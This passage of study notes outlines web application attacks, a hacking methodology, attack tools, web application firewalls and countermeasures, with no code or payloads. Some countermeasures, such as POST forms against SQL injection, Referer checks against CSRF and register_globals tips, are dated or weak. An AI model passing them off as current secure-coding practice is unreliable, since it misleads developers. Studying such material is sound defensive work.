o Configure the SSL provider to support only strong algorithms
o Ensure the certificate is valid, not expired, and matches all domains used by the site
o Backend and other connections should also use SSL or other encryption technologies
Different types of data connectivity attacks
o Connection String Injection
- In a delegated authentication environment, attackers inject parameters into a connection string by appending them with a semicolon. This can occur when dynamic string concatenation is used to build connection strings from user input.
o Connection String Parameter Pollution (CSPP) Attacks
- Attackers overwrite parameter values in the connection string.
-- hash stealing
-- port scanning
-- hijacking web credentials
o Connection Pool DoS
- Attackers examine the connection pooling settings of the target application, construct a large malicious SQL query, and run multiple queries simultaneously to consume all connections in the connection pool, in turn causing database queries to fail for legitimate users.
Attack Web App Client
o Cross-Site Scripting
o Redirection Attacks
o HTTP Header Injection
o Frame Injection
o Request Forgery Attack
o Session Fixation
o Privacy Attacks
o ActiveX Attacks
- Attackers lure victims via email or via a link that attackers have constructed in such a way that loopholes for remote code execution become accessible, allowing the attackers to obtain access privileges equal to those of an authorized user.
Other Web Application Threats
o Directory Traversal
o Unvalidated Redirects and Forwards
o Waterhole Attack
o Cross-Site Request Forgery
o Cookie/Session Poisoning
o Web Services Attacks
Sensitive Data Exposure Countermeasure
o Do not create or use weak cryptographic algorithms
o Generate encryption keys offline and store them securely
o Ensure that encrypted data stored on disk is not easy to decrypt
Hacking Methodology
o Footprint web infrastructure
o Attack web servers
o Analyze web applications
o Bypass client-side controls
o Attack authentication mechanisms
o Attack authorization schemes
o Attack access controls
o Attack session management mechanisms
o Perform injection attacks
o Attack application logic flaws
o Attack database connectivity
o Attack web app clients
o Attack web services
How to Defend Against SQL Injection Attacks
o Limit the length of user input
o Use custom error messages
o Monitor DB traffic using an IDS or WAF
o Disable commands like xp_cmdshell
o Isolate the database server and the web server
o Always use the method attribute set to POST and a low-privileged account for the DB connection
o Run the database service account with minimal rights
o Move extended stored procedures to an isolated server
o Use type-safe variables or functions such as IsNumeric() to ensure type safety
o Validate and sanitize user inputs passed to the database
SQL Allows attackers to
o Log into the application without supplying valid credentials
o Perform queries against data in the database, often even data to which the application would not normally have access
o Modify database contents, or drop the database altogether
o Use the trust relationships established between the web application components to access other databases
Attackers use LDAP to Achieve
o Login bypass
o Information disclosure
o Privilege escalation
o Information alteration
Cross-Site Request Forgery countermeasures
o Log off immediately after using a web application and clear the history
o Do not allow your browser and websites to save login details
o Check the HTTP Referer header and, when processing a POST, ignore URL parameters
Web Application Hacking Tools
o Metasploit
o w3af (http://w3af.org)
o HTTrack
o WebCopier
o WPScan
o Instant Source
o MileSCAN ParosPro
o GNU Wget
o cURL
o HttpBee
Broken Access Control Countermeasures
o Perform access control checks before redirecting the authorized user to the requested resource
o Avoid using insecure IDs, to prevent attackers from guessing them
o Provide a session timeout mechanism
o Limit file permissions to authorized users to prevent misuse
o Avoid client-side caching mechanisms
o Remove session tokens on the server side on user logout
Web Services Architecture
o SOAP: SOAP (Simple Object Access Protocol) is an XML-based protocol that allows applications running on one platform (e.g. Windows Server 2012) to communicate with applications running on a different platform (e.g. Ubuntu).
o UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available.
o WSDL: Web Services Description Language is an XML-based language that describes and traces web services.
o WS-Security: WS-Security plays an important role in securing web services. WS-Security (Web Services Security) is an extension to SOAP and aims at maintaining the integrity and confidentiality of SOAP messages and authenticating the us
Web Application Firewalls
o ServerDefender VP
o IBM Security AppScan
o Radware's AppWall
o QualysGuard WAF
o Barracuda Web Application Firewall
o ThreatSentry
o ThreatRadar
o SecureSphere
o ModSecurity
o SteelApp Web App Firewall
o Trustwave Web Application Firewall
o Cyberoam's Web Application Firewall
o Kerio Control
How to Defend Against File Injection Attacks
o Strongly validate user input
o Consider implementing a chroot jail
o PHP: Disable allow_url_fopen and allow_url_include in php.ini
o PHP: Disable register_globals and use E_STRICT to find uninitialized variables
o PHP: Ensure that all file and stream functions (stream_*) are carefully vetted
Broken Authentication and Session Management Countermeasures
o Use SSL for all authenticated parts of the application
o Verify that all users' identities and credentials are stored in a hashed form
o Never submit session data as part of a GET or POST
Countermeasures for Web Application Hacking
o Web Application Fuzz Testing
o Source code review - used to detect bugs and irregularities in the developed web applications.
o Encoding Schemes
Web Application Fuzz Testing
This is a black box testing method. It is a quality checking and assurance technique used to identify coding errors and security loopholes in web applications. Huge amounts of random data, called 'fuzz', are generated by fuzz testing tools (fuzzers) and used against the target web application to discover vulnerabilities that can be exploited by various attacks.